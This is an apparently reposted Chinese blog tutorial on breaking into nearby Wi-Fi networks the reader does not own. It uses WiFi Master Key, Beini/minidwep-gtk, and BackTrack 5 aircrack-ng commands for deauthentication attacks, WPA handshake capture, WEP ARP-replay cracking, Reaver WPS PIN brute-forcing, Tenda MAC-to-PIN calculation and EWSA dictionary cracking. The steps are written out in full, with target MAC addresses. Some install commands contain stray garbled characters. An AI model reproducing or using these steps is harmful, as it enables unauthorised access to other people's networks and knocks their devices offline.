面對電腦搜索到的無線網絡信號,你是否怦然心動?但看到一個個啟用安全的無線網絡
你是否又感到有一絲遺憾。本人作為一個心動遺憾的代表,充分發揮主觀能動性,總算學有所成,終於能成功無線密碼,這份成功的喜悅不敢獨享
寫下該篇教程,其中方法1和2大家可能都知道,重點在方法3和4.
1工具:
USB外置大功率網卡 BT5 bini奶瓶 筆記本電腦一臺 安卓手機一部
還用到 跑包軟件EWSA 及字典(字典可以自己製作)
2 方法1:
手機版萬能鑰匙
① 很簡單的,只要在有熱點的地方點擊一鍵查詢並允許它打開數據移動開關,在選擇後面有鑰匙圖標的wifi熱點
② 查看密碼的方法是:
手機要root過,然後下載RE管理器,進入RE管理器,找文件夾data , 再找misc , 繼續找wifi , 最後打開wap-supplicant.conf,我就看到之前連接過的wifi的密碼了
如圖:
安卓手機root後查看方法
① 電腦版萬能鑰匙
打開“wifi萬能鑰匙電腦版”程序,點擊要破解的熱點,當出現“含有鑰匙”的圖標時,表示可以使用wifi萬能鑰匙來破解。如圖,點擊“自動連接”就可以實現wifi萬能鑰匙成功破解的目。
當wifi萬能鑰匙成功破解熱點密碼時,任務欄右下角就會自動出現“無線網絡連接成功”的圖標,點擊該圖標,在打開的“無線網絡連接”窗口中,右擊要查看密碼的無線連接項,從彈出的菜單中選擇“屬性”在點安全,選擇“顯示字符”就可以看到密碼了
電腦查看方法
方法3 bini奶瓶破解
① 下載虛擬機及beini ISO
② 安裝好虛擬機後新建Beini ISO
虛擬機界面
② 接著點擊“Next”
下一步
③ 按browse選擇你的beini iso存放的位置加載beini然後點擊next進入
beini iso存放的位置加載beini然後點擊next進入
④ 選擇ubunt在點“Next”
選擇ubunt在點“Next”
⑤ 接在點擊“Next“
點擊“Next“
⑥ 接在
點擊“Finsh“
⑦ 啟動Beini
啟動Beini
⑧ 進入後插上USB大功率網卡後點擊桌面上
找到奶瓶這個圖標
⑨ 點擊YES
點擊YES
⑩ 進入監聽模式 點擊Wlan0走下一步
點擊Wlan0後下一步
⑪ 破解
選擇破解WPA/PA2還是WEP,在點擊 “Scan” 搜索信號
⑫ 搜索信號
搜索信號
⑬ 點擊選擇一個無線信號,這裡我們選擇“SYP” 如果沒有客戶端 Clients lnformtion下面方框就是空白,有客戶端就會顯示客戶端的MAC,現在我們選擇的“SYP” 然後在選擇一下我們要攻擊的客戶端後在點擊下一步
⑭ Client MAC 是我們選擇的客戶端的,如果沒有客戶端這個地方是空的.我們現在在點擊start抓包頁面
點擊start抓包頁面
⑮ 選擇系統自帶的字典抓包破解 password.lst 點擊OK等待密碼了
點擊OK等待密碼
⑯ 點擊Deauth進行攻擊 用自帶字典破解中 需耐心等待
破解中
⑰ 下圖表示自帶的字典沒有找到密碼,可導出握手包用WESA跑包(怎麼跑包後面介紹)
方法4水滴破解(minidwep-gtk)
一: 打開擬機及beini ISO系統 如果按照方法3 安裝beini ISO系統,那就不用在裝了,直接打開系統進入水滴破解(minidwep-gtk),水滴破解(minidwep-gtk)和bini奶瓶破解在一個系統,沒安裝的按方法3前8步安裝就行。
① 打開beini進入桌面,插上USB大功率網卡後點擊桌面上 圖標,出現對話點擊OK
圖標
② 點OK後會進入如下界面
點OK
進入如下界面
③ 選好網卡 後點擊S 掃描 選擇一個信號pin碼或抓包 pin碼就點擊Reaver,抓包就點擊L啟動,在這我先講Pin碼
④ 下面解釋下點擊Reaver出現的對話框下的命令
我們先了解下PIN碼。
PIN碼分前4 和後4 ,先破前4只有最多一萬個組合,破後4中的前3只有一千個組合,一共就是一萬一千個密碼組合。10的4次方加10的3次方等與11000個密碼組合,當Reaver確定前4 PIN密碼後其任務進度數值將直接跳躍至90.9%,也就是說只剩餘一千個密碼組合了。共11000個密碼
在PIN的時候卻總是很慢我們在PIN的時候有兩個對話框可選參數:
1 Reaver參數的意思
參數1
參數2
⑤ 在PIN的過程呢中會出現PIN不動和重碼嚴重現象,現將本人總結的跑拼之獨技奉獻給大家
一.對方路由沒開WPS, 遇到這種情況,直接放棄PIN ,可以抓包破。
二.一般是信號差,換個好天線或找個好方位
三.信道干擾嚴重,半夜起來跑拼,沒效果就放棄
四.需要等待重啟,也可能是路由太弱,需要你施展絕技應對。
五.客戶端在線,對方電腦開啟了防火牆,無端時再弄
以上原因可修改水滴參數
A. PIN不動和重碼嚴重
PIN不動和重碼嚴重
當pin 碼pin到90.9%時重碼循環 可一改參數為– a – vv - s
在告訴各位一個好消息 當遇到騰達,network路由以C8:3A:35開頭的MAC有效~,以及00B00C開頭的MAC有效時可以算出PIN 碼
1. 第一個就是騰達的!這樣子的一般直接用算就能算出密碼!
如
我們以這個C8:3A:35:41:10:88 為例,我們在初始PIN換算器輸入這個C8:3A:35:41:10:88 ,點“換算PIN”
就能得到PIN了!(42640721)
2.騰達路由器PIN計算器使用的騰達路由前6位MAC地址是C83A35或者00B00C,打開系統自帶的計算器,把計算器設置成科學型(在查看裡設置),先選擇十六進制,然後輸入騰達路由器mac地址的後六位,再點十進制,出來的數就是騰達路由的前七位pin碼,PIN的時候最後一位可以從0開始,到9才10碼,就出來PIN碼了。
如圖:
然後我們把這個PIN(42640721)輸入到QSS裡面的第3項,就能直接上網了
下一步就行
就能成功上網了!
3算出PIN碼還可以在Pin的時候加上 – P ×××××××(PIN碼)可以PIN的進度一下子到90%,要不了多久密碼出來了
破解中
等PIN結果
等PIN結果
以上是PIN嗎碼破解
二:在來講抓包
1 打開beini進入桌面,插上USB大功率網卡後點擊桌面上 圖標,出現對話點擊OK
2點OK後會進入如下界面
3選好網卡 後點擊S 掃描 選擇一個信號pin碼或抓包 pin碼就點擊Reaver,抓包就點擊L啟動,在這我先講抓包
3抓到握手包後提示是否要在字典搜索 點擊OK搜下看能否出密碼
4 點OK 搜索中。。。等待密碼
5提示沒搜索到密碼,點擊OK
6提示拷貝到硬盤點OK
7 繼續OK
7接著OK存到media
8插上U盤 U盤裡要有子典啊 字典可以下載 在點擊D跑包
選擇握手包路徑
選擇字典
跑包中》》》
密碼就會出現如下圖:
如果沒找到密碼就如下 點OK
提示你保存握手包到硬盤的分區點YES OK
記住握手包位置 等下要導出用EWSA跑包
提示保存好了
備註:保存好了以後不用去掃描,同時握手包還需要用軟件ewsa跑包,在這裡先不介紹,等把最後我知道的一種方法講完在介紹
方法6 bt5破解
1 下載bt5 在虛擬機裡安裝(這裡安裝就不介紹了,刻盤或U盤都能可以,不會安裝的請按照方法1就可以)
2打開bt5
BT5啟動時需要用戶名(root)和密碼(toor)開始startx
3進入桌面後點擊終端
4打開終端後 首先查看網絡連接:
輸入root@bt:~# ifconfig -a #查看所有連接
5激活無線網卡:
root@bt:~#ifconfig wlan0 up
6設置無線網卡為混雜模式
root@bt:~#airmon-ng start wlan0
7再次查看網絡連接發現多了個mon0接口,以下就通過mon0開始破解無線網絡
root@bt:~#ifconfig -a
8破解WPA網絡
首先找到目標,看哪個網絡容易破解,一般有客戶端連接的路由器才比較容易破解
root@bt:~#airodump-ng mon0
9 wpa要找有客戶端的通過接入點mac查看上面的掃描結果,選取合適的進行抓包抓包命令 可以再開一個shell,比較方便查看)
airodump-ng -c 6 --bssid C8:3A:35:19:42:B0 -w myap mon0
解釋
-c 是信道這裡選6 ,此項也可以不寫,程序自動掃描
--bssid 是要PJ的ap的mac
-w 是如果抓到握手包,保存在此文件(myap),文件名可以隨便取,自己記住就行
然後把這個窗口放旁邊,再開一個shell
在有客戶端連接的情況下,可以用deauh攻擊讓客戶端下線,客戶端一般都會自動連接,這時就可以抓到握手包了。
對客戶端進行deauth攻擊
root@bt:~#aireplay-ng -0 3 -a C8:3A:35:19:42:B0 -c E8:D4:E0:D0:60:9C mon0
參數說明:-0 攻擊模式是deauth, -0 3 發送3次deauth攻擊
-a AP的mac 地址
-c 客戶端地址
攻擊的時候同時抓包,抓包窗口會提示抓到握手包: WPA handshake:E0:05:C5:A7:BB:92
deauth攻擊的目的已經達到,現在可以停止抓包了,開始破解WPA密碼:
root@bt:~#aircrack-ng -w WPA.txt 20121025-01.cap
參數說明:-w 字典文件
選擇有handshake的無線網絡,開始破解
WPA.txt 是事先在網上下載好的無線WPA字典,包含一些常用的密碼和生日密碼等等
9破解WEP無線網絡
WEP破解是100%能破解出來的,不管多複雜的密碼,只要能夠抓夠足夠的IVS
還是先查找目標網絡:
root@bt:~#airodump-ng –encrypt WEP mon0 #只抓WEP加密的網絡
找到目標網絡之後開始抓包保存
root@bt:~#airodump-ng –ivs -w 20121025 -c 11 mon0
為了能快速收集IVS,在有客戶端的情況下進行ARP REQUEST 攻擊
root@bt:~#aireplay-ng -3 -b E0:05:C5:A7:BB:92 -h 98:0C:82:AC:1A:10 mon0
收到5000個以上IVS之後,就可以破解了,如果破解不成功再多收集IVS
root@bt:~#aircrack-ng –ivs 20121025*.ivs
破解成功!wep加密基本是100%破解成功,所以一般不要設置加密方式為WEP,不過不要以為wpa/wpa2加密就高枕無憂了,
WPA密碼要設置儘量雜點,不要用純數字,8~10位的純數字密碼一般的破解字典都有。
10 reaver窮舉PIN
① 下載reaver-1.4.tar.gz(或未來更高版本)
安裝reaver。
在聯網情況下0 K! W' d# Z5 _" k8 Y9 Q _
1、首先安裝:Reaver相關庫文件
打開終端命令窗口,依次執行:
$ sudo apt-get install libpcap-dev
$ sudo apt-get install libsqlite3-dev
下載Reaver 1.4:http://www.xxxxx.com (地址我也沒有 這裡只是做例子)
解壓到桌面/reaver-1.4
在終端命令窗口中進入到reaver文件的目錄:
$ cd桌面/reaver-1.4/src
$ ./configure #備註:(如果提示沒有權限,可先執行chmod +x configure,然後再運行./configure或; sh ./configure)
8 i' A- P+ ], V6 b7 l7 N" T1 F+ T& ]; E, {: m; n" Z$ make
. y* I% M1 h+ H" ~$ sudo make install
如機器未安裝Aircrack-ng,運行下列命令下載安裝:
$ sudo apt-get install aircrack-ng
在未聯網情況下
1. 在Windows下下載Reaver 1.4
2. 使用Winrar或則7zip解壓reaver-1.4.tar.gz文件,拷貝src文件夾到U盤
3回到Vbox,打開正在運行的BT5虛擬機,點擊設備-->分配USB設備-->選中優盤
4.稍等片刻,優盤圖標就出現在了Bt5桌面,雙擊打開優盤,右擊src文件夾,點copy
右擊BT5桌面空白處,點paste將src文件夾,拷貝到桌面上。
點上方Terminal圖標,逐條運行以下指令:cd /root/Desktop/src
./configure備註:(如果提示沒有權限,可先執行chmod +x configure,然後再運行./configure或; sh ./configure)
make
make install至此reaver安裝完成
二.開始pin破解
打開shell窗口
1 輸入:airmon-ng start wlan0 開啟監聽模式
2 輸入:wash -i mon0 -C 查看所有開啟WPS的無線路由 長時間無反應按Ctrl+C,結束進程,這時記下你要破解的目標路由MAC
3 輸入:airodump-ng mon0 網卡以混雜模式掃描所有頻道---並顯示所有AP的信息(包括 AP的信號強度,ESSID,MAC,頻道,加密方式,等等.....),按Ctrl+C,結束掃描.
注:如果你已知對方無線路由信息第2,第3步可省略!:
4 例如要破解‘kay’的網絡,輸入命令:reaver -i mon0 -b F4:EC:38:48:9F:BE -vv(兩個v), 開始窮舉pin碼 知道PIN碼可以在 –vv 後面加上-p xxxxx(pin碼)
5.中間出現重複的time out,因為reaver可以自動保存進度,所以果斷按Ctrl+C中斷,然後重試
6.-vv參數可以顯示更多信息,也可以加入-S參數。最後,成功破解
到此破解全部介紹完了,各位是否還記得前面提到的握手包,在這給各位講下跑握手包
1 把抓到的握手包放到Windows .並下載EWSA
2打開EWSA
2導入握手包
- 配置EWSA ,1.選項 字典DIY 字典設置 密碼變化選項 把勾選都去掉,2.選項 字典DIY 字典設置 導入我們自己的字典,(生日字典和8位純數字字典)
點擊開始測試,一般是生日字典的話,2分鐘就能跑出密碼,如是 8位純數字的話,最多12小時,cpa或cpa2密碼都可以跑出來的
好啦教程到此結束了
閱讀更多 小方美好生活 的文章
